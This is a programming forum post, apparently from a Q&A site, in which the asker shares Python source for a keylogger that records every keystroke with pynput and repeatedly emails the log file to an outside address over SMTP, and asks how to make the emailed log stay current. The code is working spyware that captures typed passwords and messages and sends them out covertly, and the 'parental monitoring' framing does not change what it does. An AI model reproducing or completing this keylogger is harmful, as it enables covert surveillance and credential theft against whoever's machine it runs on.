# Problem opening and closing file to send over email python

Tags: file, keylogger

I've been dabbling in cyber security and doing some research on parenting monitoring tools and thought a key-logger/email sender would be a good project to learn how to build.

So the code I have sends an email correctly, and also sends the generated text file as an attachment.

The problems I'm having and need help with are:
1. As the key logger continues to log keystrokes, the email attachment does not update the file, it just sends the original file in the original path.

2. I would like to create a way to search for the path of the text file belonging to the key logger function, from the email function.  In other words, I don't want to have to hard code the file path where the email should be looking for the attachment.
3. If there is a better way to do this, I'm all ears as I am learning.  One way I thought was just read the contents of the keystrokes into an open file that is linked for sending through the email, but am not sure how to go about doing this.  My code below.  Thanks!

I am using Python latest version for windows.  3.x

```
from pynput.keyboard import Key, Listener
import logging
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.mime.base import MIMEBase
from email import encoders
import time
import threading



def main():


    def logger():

        logging.basicConfig(filename=("" + "key_log.txt"), 
        level=logging.DEBUG, format='%(asctime)s: %(message)s')

        def on_press(key):
            logging.info(str(key))
        with Listener(on_press=on_press) as listener:
            listener.join()




    def mail():
        email_user = 'youremail@email.com'
        email_password = 'password'
        email_send = 'theiremail@email.com'

        subject = 'Test'
        #Creating message object for email.  Tying message object to 
        variables above.


        msg = MIMEMultipart()
        msg['From'] = email_user
        msg['To'] = email_send
        msg['Subject'] = subject
        #Actual message.
        body = 'Hi there, sending this email from Python!'
        #Attach a file
        msg.attach(MIMEText(body,'plain'))
        #File path needs double slash here. Filename is reference variable to 
        file location
        filename='C:\\Users\\JamesLaptop\\Desktop\\Python\\key_log.txt'
        #create attachment variable, open, filename and 

        attachment=open(filename,'rb')

        part = MIMEBase('application','octet-stream')
        part.set_payload((attachment).read())
        encoders.encode_base64(part)
        part.add_header('Content-Disposition',"attachment; filename= 
        "+filename)

        msg.attach(part)
        text = msg.as_string()
        server = smtplib.SMTP(host = 'smtp.mail.yahoo.com', port = 587)
        server.starttls()
        server.login(email_user,email_password)
        #send message
        while True:
            try:
                server.sendmail(email_user,email_send,text)
                print("Success")
                time.sleep(20)
            except Exception:
                print("Message failed to send")

        server.quit()



    w = threading.Thread(target = logger)
    w2 = threading.Thread(target = mail)
    w.start()
    w2.start()


main()
```

Comment: Any input on this?

Comment: The attachment is sending just fine.  Ignore the 20 second delay, I just had that in there for testing purposes.

The problem I'm having is that as the logger logs to the text file, the email will send the attachment but will not send an updated text file because the folder is still open and being written to.  

I need a clean way to close the file, and re-open the function to start again after it captures so many characters... or so much time goes by.. etc.